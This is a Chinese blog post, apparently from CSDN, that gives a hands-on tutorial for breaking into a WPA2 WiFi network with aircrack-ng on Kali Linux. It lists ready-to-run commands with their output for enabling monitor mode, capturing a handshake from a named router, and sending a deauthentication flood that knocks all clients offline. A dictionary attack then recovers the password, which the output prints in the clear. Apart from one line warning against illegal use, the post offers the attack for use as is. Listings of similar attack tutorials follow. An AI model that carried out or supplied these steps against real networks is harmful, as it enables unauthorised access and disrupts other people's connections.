无线路由攻击和WiFi密码破解实战[渗透技术]

已于 2022-04-21 10:21:10 修改
阅读量7k 收藏 86
点赞数 7
分类专栏: 网络安全 文章标签: wifi Kali Linux 路由攻击
于 2020-08-18 11:06:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43073558/article/details/108033703
版权

文章目录

一、准备阶段

  • 攻击主机:kali Linux
  • 攻击工具:aircrack-ng、airodump-ng、airmon-ng、aireplay-ng
  • 网卡一枚
    在这里插入图片描述
可以通过命令: sudo iwconfig 查看网卡是否已经就绪。

我的网卡名为:wlan0

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

二、攻击阶段

1.停止🛑网络管理员

为了防止干扰,我们需要关闭网络管理员

停止🛑网络管理员

sudo service network-manager stop

杀死进程

sudo airmon-ng check kill

2.开启网卡监听模式

开启监听后,就可以通过网卡监听附近的路由设备了。

语法:sudo airmon-ng start 网卡名

例:

sudo airmon-ng start wlan0mon

出现以下形式表示开启成功!

root@kali:~# sudo airmon-ng start wlan0mon


PHY     Interface       Driver          Chipset

phy0    wlan0mon        rt2800usb       Ralink Technology, Corp. RT2870/RT3070

                (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)

开启成功后可以发现网卡名由:wlan0变成了wlan0mon

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

3. 捕获数据包

捕获数据包指的是,通过网卡扫描附近的路由器,至于扫描距离的远近,由自己的网卡的质量决定,通过扫描可以得到路由的MAC地址(BSSID )、信道(CH)值、 WiFi的名字、加密的方式等等。

语法: airodump-ng 网卡名

例:

sudo airodump-ng wlan0mon

当看到要攻击的路由WiFi名(靶机)时,按CTRL+C停止,如下图所示:(我要攻击的就是:WiFi名为 CMCC-QingFeng 的路由器 )

root@kali:~# airodump-ng wlan0mon

 CH 13 ][ Elapsed: 26 mins ][ 2020-08-15 23:57                                                                                            
                                                                                                                                          
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                          
                                                                                                                                          
 80:54:6A:6C:BA:C0  -50      407     4907   40   1  130   WPA2 CCMP   PSK  CMCC-QingFeng                                                  
                                                                                                                                          
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                        
                                                                                                                                          
 (not associated)   22:C9:4E:48:C1:16  -78    0 - 1      0       12                                                                        80:54:6A:6C:BA:C0  38:37:8B:07:71:69  -18    0e- 6      0      534                                                                       
 80:54:6A:6C:BA:C0  7C:B3:7B:95:BA:50  -62    0e- 0e     8     2476                                                                       
 80:54:6A:6C:BA:C0  F4:70:AB:95:A1:14  -78    0e- 1      0     1375                                                                       
 80:54:6A:6C:BA:C0  70:C9:4E:48:C1:16  -76    0e- 1    396     2485         CMCC-QingFeng                                                 
Quitting...

4.获取数据包

获取数据包(握手包)的作用主要是为下面的破解做准备。

语法:

sudo airodump-ng -c -w  --bssid  网卡名

参数说明:

  • -c:信道值
  • -w:获取到的数据包的保存路径
  • –bssid:MAC地址

例:

 sudo airodump-ng -c 1 -w /root/admin --bssid  80:54:6A:6C:BA:C0   wlan0mon

在这里插入图片描述

5.注入数据包(DeAuth洪水攻击)

向路由设备连续发送取消认证数据包,此过程中所有连接的设备都会被强制下线。如果可以破解,那么会在第四步终端的右上角显示握手包,文件会保存在你指定的位置。有些加密方式不好被破解,受到很多因素的影响,比如字典的强度主机,总之强大的字典是必不可少的。

语法:

sudo aireplay-ng -0  n	-a	网卡名

参数说明:

  • -0:表示取消认证数据包
  • n:表示攻击次数(向路由器发送数据包的次数)
  • -a:对应的路由器的BSSID
  • 网卡名:自己的网卡的名字,可通过sudo iwconfig查看

例:

第四步终端不要关闭,新建一个终端输入以下代码,就可以实施对路由器的攻击了,这时候你连接此路由器可以发现根本连不上,如果你先前已经连接此路由器,执行下面命令后可以发现客户端被强制下线,时间的长久由攻击次数决定,下面例子中我的攻击次数是5次。

sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon

root@kali:~# sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon
00:34:39  Waiting for beacon frame (BSSID: 80:54:6A:6C:BA:C0) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
00:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]

注:当你执行上面命令的时候,所有连接上的客户端将统统被强制下线,切记!切记!切记,不要用此去做有关违法的事。

5.WiFi密码破解

这一步是破解密码,至于能不能破解就看你的字典的强度主机牛不牛逼了,还有就是要有耐心等了,哈哈!

语法:aircrack-ng -w 字典路径 has.cap路径

例:

aircrack-ng -w /root/admin/directory/dic1  /root/admin/-01.cap
下面运行结果中可以看到密码已经被成功破解出来了,密码为:guu3nif2(KEY FOUND! [ guu3nif2 ]) 
root@kali:~/admin# aircrack-ng -w /root/admin/directory/dic1  /root/admin/-01.cap
Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.

   #  BSSID              ESSID                     Encryption

   1  80:54:6A:6C:BA:C0  CMCC-QingFeng             WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.

1 potential targets


                               Aircrack-ng 1.6 

      [00:00:00] 1/1 keys tested (13.07 k/s) 

      Time left: --

                           KEY FOUND! [ guu3nif2 ]


      Master Key     : A7 21 22 70 BA 88 13 33 CE DB 99 89 A3 02 B4 0E 
                       3E 70 BB FF D3 39 DA B0 70 B4 61 08 38 BF 9D 19 

      Transient Key  : DC 87 B9 63 C4 D8 47 AE 0F 69 3E A3 E9 73 20 6E 
                       DC B3 B7 6E DD 68 AB 4A 2F 0B 94 A3 6A 9A 53 2C 
                       FA 30 6C 2B C8 8A 1C A8 73 2F 1B DB F8 A9 3D 56 
                       9B 91 3B 23 3D 70 AA 89 B3 02 96 27 D6 86 A4 5F 

      EAPOL HMAC     : 05 48 48 0A CB 6D 82 89 26 93 8B C2 3F 31 0C 86
星牛君
关注
  • 7
    点赞
  • 86
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
实战!使用手机进行wifi入侵
jennycisp的博客
12-30 3665
出门在外,总离不开手机,手机总离不开网络,而网络就涉及到WiFi了。到一个地方总会问下这里的wifi密码多少,公共场所的wifi其实特别不安全,表面上风平浪静,其实你连接上wifi之后,你所输入的账户密码,个人信息等一些敏感信息都被某个暗中观察的设备一览无余。作者写这篇文章的初衷是让大家提起警惕,起到有安全意识作用。下面我为大家演示如何使用手机进行wifi入侵,手机操作的局限不亚于电脑,只要你手机配置好,也是一样可以在手机装个linux系统和电脑进行一样的操作攻击,只是手机打字比较慢。
路由攻击(ospf attack)及C/C++代码实现
chen1415886044的博客
08-27 1041
开放式最短路径优先(OSPF)是应用最广泛的域内路由协议之一。不幸的是,它有许多严重的安全问题。OSPF上的伪造是可能导致路由循环和黑洞的最关键的漏洞之一。 大多数已知的OSPF攻击基于伪造攻击者控制的路由器的链路状态通告(LSA)。如果攻击者控制的路由器地理位置优越。然而,这些攻击只能伪造路由域的拓扑结构;因此它们的效果通常是有的。更多强大的攻击会影响其他未受控制的路由器的LSA攻击者。然而,这些攻击通常会引发“反击”受害者路由器的机制,该机制通告校正LSA攻击的影响是不持久的。
无线WiFi安全渗透与攻防(十三)之WPA破解-windows下GPU跑包加速
最新发布
cc123489ll的博客
05-28 370
一个非常不错的网络网络破解工具,可以直接破解握手包,xp系统下速度非常快。EWSA全称Elcomsoft Wireless SecurityAuditor。号称可以利用GPU的运算性能快速攻破无线网络密码,运算速度相比使用CPU可提高最多上百倍。本软件的工作方式很简单,就是利用词典去暴力找回无线AP上的WPA和WPA2密码,还支持字母大小写、数字替代、符号顺序变换、缩写、元音替换等12种变量设定,在ATI和NVIDIA显卡上均可使用。使用该软件前要事先抓好WPA握手包。
渗透测试--6.1.aircrack-ng破解wifi密码
我是个好人呀,????
05-18 9475
是一个完整的工具来评估Wi-Fi网络安全套件(ex.1)。
永久关闭power management
滕青山博客
01-18 1321
查看电源管理 首先执行sudo iwconfig enp0s25 no wireless extensions. wlp3s0 IEEE 802.11 ESSID:"wonderful_world" Mode:Managed Frequency:2.462 GHz Access Point: 8C:A6:DF:AE:E0:17 Bit Rate=121.5 Mb/s Tx-Power=14 dBm Ret
kali 简单版攻击WiFi(附详细教程)
Alphamilk的博客
12-08 1万+
由于有关这方面内容的详细介绍实在不少,但是复习起来也比较麻烦,重点和次重点之间可能会混淆,所以写一篇复习起来比较方便的一篇水文>_
查看无线网卡工作模式
大学霸__IT达人
04-15 1488
查看无线网卡工作模式 查看无线网卡工作模式,一般情况下,无线网卡有四种工作模式,分别是Managed模式、Master模式、Adhoc模式和Monitor模式。大学霸IT达人查看无线网卡工作模式。默认情况下,无线网卡工作模式为Managed,可以用来连接到无线网络。当用户实施无线渗透时,通常需要将无线网卡设置为监听模式(Monitor)。一些用户设置监听模式后,不确定是否设置成功。此时,可以使用...
Aircrack-ng 1.6版本 Centos7和mac安装
wank1259162的博客
03-15 4254
Aircrack-NG是一个完整的工具套件,以评估无线网络的安全性。 它着重于WiFi安全的不同领域: 监视:数据包捕获并将数据导出到文本文件,以供第三方工具进行进一步处理 攻击:通过数据包注入来重放攻击,取消身份验证,伪造的接入点和其他攻击 测试:检查WiFi卡和驱动程序功能(捕获和注入) 破解:WEP和WPA PSK(WPA 1和2) 所有工具都是命令行,可以进行大量脚本编写。许多...
网络安全--Kali使用mdk3攻击wifi(详细教程)
懷淰メ的博客
07-10 2万+
本次依然使用Kali系统,配合mdk3进行wifi伪造、连接设备查看、解除认证攻击。 本次实验只用于学习交流,攻击目标为自家的路由WiFi,请勿违法!3070或者8187网卡,博主使用的是某鱼上买的二手8187网卡。 大家也可以根据下面的表格选择合适的网卡。 在上面的表格中,列出了支持的网卡驱动、制造商、是否作为AP、是否支持监听及支持的协议模式。在表格中,?表示不确定,yes表示支持,no表示不支持。使用Windows主流虚拟机软件:VMware虚拟机系统是重点,选用的是Kali系统,也可以选用支持md
Kali渗透基础》14. 无线渗透(四)
学习学习学习......
08-09 1385
Aircrack-ng、JTR、Evil Twin Attacker、Wifipumpkin3、Fern-WiFi-Cracker、Kismet、Reaver、WiFite、MAC 地址绑定攻击、WEP 攻击、WPA PSK 攻击、WPA 企业攻击、WPS 攻击无线侦查。
实战!入侵隔壁家WiFi与获取路由器管理权!
热门推荐
sumkee911‘s coding
11-14 6万+
大家好,今天是网络安全的话题,内容很入门,高手可以直接跳过。 本文章只供大家学习之用,请不要以身试法,否则后果自负。   1.获取WiFi密码 首先我们要获取WiFi密码,需要用到一张无线网卡(本人用RT3070)、Aircrack-ng工具、密码字典。 Aircrack-ng下载地址:http://www.aircrack-ng.org/ 密码字典下载地址:链接: https://p...
通过WIFI渗透到内网服务器和主机
bigblue00的博客
10-26 4301
测试目的:通过WIFI渗透到内网,并对内网进行扫描,收集设备信息,并尽可能的拿到多的权限。 测试设备:两台笔记本电脑 :PC1, PC2 ; 一个USB无线网卡RT5572; 一个无线AP 测试环境:PC1 WIN10系统,安装虚拟机KALI,桥接上网。利用USB无线网卡破解目标网络的WIFI密码,连接到内部网络。 获取到IP址: 宿主机PC1 IP:10.10.10.103 KALI IP: 10.10.10.110。 宿主机PC2 WIN7系统,安装两个虚拟机WIN7和RHEL7作为测试目标,桥接上网。
无线攻击 --aircrack-ng套件之一:Airmon-NG(无线监听工具)
Kevin's Blog
03-05 1万+
文章目录一、用法概述二、命令格式三、用法示例3.1 显示接口状态3.2 检测干扰进程3.3 开启无线监听3.4 关闭无线监听 一、用法概述   airmon-ng是aircrack-ng的套件之一,辅助aircrack-ng用! 用于在无线接口上启用和禁用监听模式 从监控模式返回到托管模式 在没有参数情况下输入airmon-ng命令将显示接口状态 列出 / 杀死可以干扰的程序配合无线网卡操作 ...
无线热点攻击
重启专家的博客
12-21 705
无线热点攻击 AIRCRACK 简介 无线渗透和审计神器 包含各种功能的工具套件 网络检测 嗅探抓包 包注入 密码破解 基础操作 检查可能的干扰项及消灭干扰项 airmon-ng check airmon-ng check kill airmon-ng check 如果还有干扰项可以如 service network-manager stop 启动监听模式 airmon-ng start wlan0 1 # 指定监听信道1 iwconfig # 检查是否进入监听模式 airmon-ng stop wlan0
渗透测试--6.无线网络渗透
我是个好人呀,????
05-18 1456
大家应该都有过这样的经历,就是感觉自己家的无线网怎么感觉好像变慢了,"是不是有人蹭我家网?"“还有的时候咱们出门也想试图蹭一下别人家的网”,这里**“蹭网"的前提是要破解对方的"无线密码”,那么这个"无线密码"到底是否安全呢?其技术原理是如何的呢?我们又应该如何防范他人"蹭网"呢?**
Kali-linux攻击路由器​
2301_77162959的博客
05-27 2809
前面介绍的各种工具,都是通过直接破解密码,来连接到无线网络。由于在一个无线网络环境的所有设备中,路由器是最重要的设备之一。
kali linux的airmon-ng工具进行wifi密码破解
weixin_54754074的博客
12-07 5804
一、准备: 1.Kali Linux操作系统 2.支持监听功能的网卡 3.密码字典 二、连接有监听功能的网卡,并激活网卡的监听功能 执行ifconfig命令会多一个wlan0出来,这个就是我们的网卡 这里我们用root权限用airmon-ng命令来测试一下我们的网卡是否支持监听功能(无线网卡wlan0出现表示支持,没出现就是不支持) airmon-ng 然后我们就用airmon-ng start wlan0命令激活无线网卡,开启网卡的监听模式。 airmon-ng start wlan0 用i
无线网络渗透测试(二)
Darenfy 随记
03-09 2454
无线网络监听模式 网络监听原理 无线网卡有四种工作模式 Managed 模式 主要用于无线客户端与 AP 进行通信 Master 模式 部分网卡支持该模式,即可以使得设备本身成为无线接入点 AP Ad-Hoc 模式 可以理解为在一个网络中,所有设备对等,没有管理者 Monitor 模式 用于监控无线网络内部的流量 一般情况下,网卡都处在管理模式,就是只负责把数据包传送给所有主机,不搞事。 当网卡处于监听模式时,将获取在局域网中的所有数据包,不主动与其他主机交换信息,不修改在网络中传输的数据包 设置监听模
Beini无线路由密码破解教程:入门到实战
本篇教程详细介绍了如何使用Beini系统进行无线路由密码的破解,它是一...通过学习和实践这些步骤,用户可以掌握无线路由密码破解的基本技能,但请注意,这类操作主要用于教育和研究目的,不应用于未经授权的网络活动。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星牛君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值